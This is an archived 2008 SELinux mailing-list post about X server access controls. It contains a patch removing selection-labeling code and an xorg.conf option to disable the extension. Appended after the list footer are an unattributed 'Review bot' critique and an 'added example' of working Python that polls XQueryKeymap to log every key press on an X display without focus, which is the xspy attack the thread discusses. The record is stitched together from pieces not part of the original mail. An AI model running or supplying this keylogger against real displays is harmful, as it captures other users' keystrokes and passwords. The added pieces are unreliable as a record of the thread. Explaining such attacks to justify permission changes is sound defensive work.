
List:       selinux
Subject:    Re: Permissive mode for xace is broken.
From:       Eamon Walsh <ewalsh () tycho ! nsa ! gov>
Date:       2008-02-27 3:46:48
Message-ID: 47C4DD28.90805 () tycho ! nsa ! gov

Joe Nall wrote:
> On Feb 26, 2008, at 8:31 PM, Eamon Walsh wrote:
>   
>> I found the source of the BadWindow errors.  I'm going to fix this  
>> upstream and throw an SRPM patch to Dan so he can test.
>>
>> Also, I think I'm going to change XQueryPointer() from requiring  
>> "read" to simply "getattr" permission on the device.  I really do  
>> think it should require "read," but too many things call it and we  
>> need to turn "read" off to prevent the xspy attack.
>>
>> Finally, I'm going to try and get the polyinstantiation code for  
>> properties and selections in before the feature freeze.
>>     
>
> Awesome. Can I get a copy of the patch too?
>
> joe
>   

Attached and selinux list cc'ed.

One more thing: the SELinux extension is part of extmod, so you can do 
this in your xorg.conf if you want to disable it:

Section "Module"
        SubSection "extmod"
                Option "omit SELinux"
        EndSubSection
EndSection


At the present time there is no enforcing/permissive switch for just the 
xserver.


-- 
Eamon Walsh <ewalsh@tycho.nsa.gov>
National Security Agency


["badwindow_fix.patch" (text/x-patch)]

From 4632ea22580c31d44b0786321668d9e78f02900e Tue Feb 26 22:00:52 2008
From: Eamon Walsh <ewalsh@tycho.nsa.gov>
Date:   Tue Feb 26 22:00:52 2008 -0500
Subject: Temporary BadWindow error fix.

---
diff --git a/Xext/xselinux.c b/Xext/xselinux.c
index 5aa2ad3..60ec8d4 100644
--- a/Xext/xselinux.c
+++ b/Xext/xselinux.c
@@ -951,42 +951,11 @@ static void
 SELinuxSelectionState(CallbackListPtr *pcbl, pointer unused, pointer calldata)
 {
     SelectionInfoRec *rec = calldata;
-    SELinuxSubjectRec *subj;
-    SELinuxObjectRec *obj;
 
     switch (rec->kind) {
     case SelectionSetOwner:
-	/* save off the "real" owner of the selection */
-	rec->selection->alt_client = rec->selection->client;
-	rec->selection->alt_window = rec->selection->window;
-
-	/* figure out the new label for the content */
-	subj = dixLookupPrivate(&rec->client->devPrivates, subjectKey);
-	obj = dixLookupPrivate(&rec->selection->devPrivates, objectKey);
-	sidput(obj->sid);
-
-	if (avc_compute_create(subj->sid, subj->sid, SECCLASS_X_SELECTION,
-			       &obj->sid) < 0) {
-	    ErrorF("SELinux: a compute_create call failed!\n");
-	    obj->sid = unlabeled_sid;
-	}
-	break;
-
     case SelectionGetOwner:
-	/* restore the real owner */
-	rec->selection->window = rec->selection->alt_window;
-	break;
-
     case SelectionConvertSelection:
-	/* redirect the convert request if necessary */
-	if (securityManager && securityManager != rec->client) {
-	    rec->selection->client = securityManager;
-	    rec->selection->window = securityWindow;
-	} else {
-	    rec->selection->client = rec->selection->alt_client;
-	    rec->selection->window = rec->selection->alt_window;
-	}
-	break;
     default:
 	break;
     }
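Review bot: the three case labels left empty (SelectionSetOwner, SelectionGetOwner, SelectionConvertSelection) now fall straight through to `default: break;` with no comment, so a reader of xselinux.c cannot tell this is the temporary workaround the subject line describes rather than intended behaviour; put a FIXME at `case SelectionSetOwner:` naming the BadWindow problem. Deleting the whole SetOwner body also drops the relabeling done by `avc_compute_create(subj->sid, subj->sid, SECCLASS_X_SELECTION, &obj->sid)`, so a selection keeps whatever label it had across owner changes, which is more than the owner/window redirection this fix is aimed at; if the BadWindow errors come from restoring `rec->selection->alt_window` in SelectionGetOwner (a window saved at SetOwner time that need not still exist), the narrower change is to keep the SetOwner labeling and remove only the alt_client/alt_window swap and the securityManager redirect. Also note for the follow-up: `securityManager`, `securityWindow` and the `alt_client`/`alt_window` selection fields are no longer referenced from this callback.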

--
This message was distributed to subscribers of the selinux mailing list.
If you no longer wish to subscribe, send mail to majordomo@tycho.nsa.gov with
the words "unsubscribe selinux" without quotes as the message.
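The "xspy attack" the reply above wants to block by denying "read" on the x_device class works by polling XQueryKeymap: the server returns a 32-byte bit vector with one bit per keycode, and diffing successive snapshots reveals every key press without the client holding focus. The following is an added example, not code from the original mail or from the X server or xspy; the keymap decoding is pure Python and runs offline on constructed snapshots, while the polling function loads libX11 through ctypes and is only invoked explicitly, needing a reachable DISPLAY. Keycode numbers in the sample are arbitrary constructed values, not a claim about any keyboard layout.

```python
"""Keymap polling behind the xspy attack (added example, not from the thread)."""
from __future__ import annotations

import ctypes
import ctypes.util
import time

# XQueryKeymap fills a 32-byte vector: 256 keycodes, one bit each (X11 core protocol).
KEYMAP_BYTES = 32


def pressed_keycodes(keymap: bytes) -> set[int]:
    """Decode a keymap bit vector into the set of keycodes currently held down.

    Bit i of byte n corresponds to keycode n*8 + i.
    """
    if len(keymap) != KEYMAP_BYTES:
        raise ValueError("keymap must be exactly 32 bytes")
    return {n * 8 + i for n, byte in enumerate(keymap) for i in range(8) if byte & (1 << i)}


def newly_pressed(previous: bytes, current: bytes) -> set[int]:
    """Keycodes that are down in `current` but were not down in `previous`."""
    return pressed_keycodes(current) - pressed_keycodes(previous)


def poll_keymap(display_name: str | None = None, duration_s: float = 5.0,
                interval_s: float = 0.01) -> list[int]:
    """Poll XQueryKeymap for `duration_s` seconds and return new key presses in order.

    Requires libX11 and an X display. Under the SELinux extension this request is
    checked against the x_device class; it is the "read" permission that the thread
    proposes to withhold from untrusted clients, which is what stops this loop.
    """
    path = ctypes.util.find_library("X11")
    if path is None:
        raise RuntimeError("libX11 not found")
    libx11 = ctypes.CDLL(path)
    libx11.XOpenDisplay.restype = ctypes.c_void_p
    libx11.XOpenDisplay.argtypes = [ctypes.c_char_p]
    libx11.XQueryKeymap.argtypes = [ctypes.c_void_p, ctypes.POINTER(ctypes.c_char)]
    libx11.XCloseDisplay.argtypes = [ctypes.c_void_p]

    dpy = libx11.XOpenDisplay(display_name.encode() if display_name else None)
    if not dpy:
        raise RuntimeError("cannot open X display")

    buf = (ctypes.c_char * KEYMAP_BYTES)()
    events: list[int] = []
    try:
        libx11.XQueryKeymap(dpy, buf)
        prev = bytes(buf.raw)
        deadline = time.monotonic() + duration_s
        while time.monotonic() < deadline:
            libx11.XQueryKeymap(dpy, buf)
            cur = bytes(buf.raw)
            events.extend(sorted(newly_pressed(prev, cur)))  # presses since last poll
            prev = cur
            time.sleep(interval_s)
    finally:
        libx11.XCloseDisplay(dpy)
    return events


# Constructed snapshots (not captured from a real server): first keycodes 24 and 38
# are down, then 38 is released and keycode 7 is pressed.
SAMPLE_BEFORE = bytes([0, 0, 0, 0x01, 0x40] + [0] * 27)
SAMPLE_AFTER = bytes([0x80, 0, 0, 0x01, 0] + [0] * 27)


def demo() -> set[int]:
    """Offline demonstration of the diff step on the constructed snapshots."""
    return newly_pressed(SAMPLE_BEFORE, SAMPLE_AFTER)


if __name__ == "__main__":
    print("pressed in first snapshot:", sorted(pressed_keycodes(SAMPLE_BEFORE)))
    print("newly pressed in second snapshot:", sorted(demo()))
```

The trade mentioned in the reply follows from this: XQueryPointer reports only the pointer position plus the button/modifier mask, not the per-keycode vector, so leaving it at "getattr" while moving XQueryKeymap-style access behind "read" keeps the common callers working and still removes the keystroke channel.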
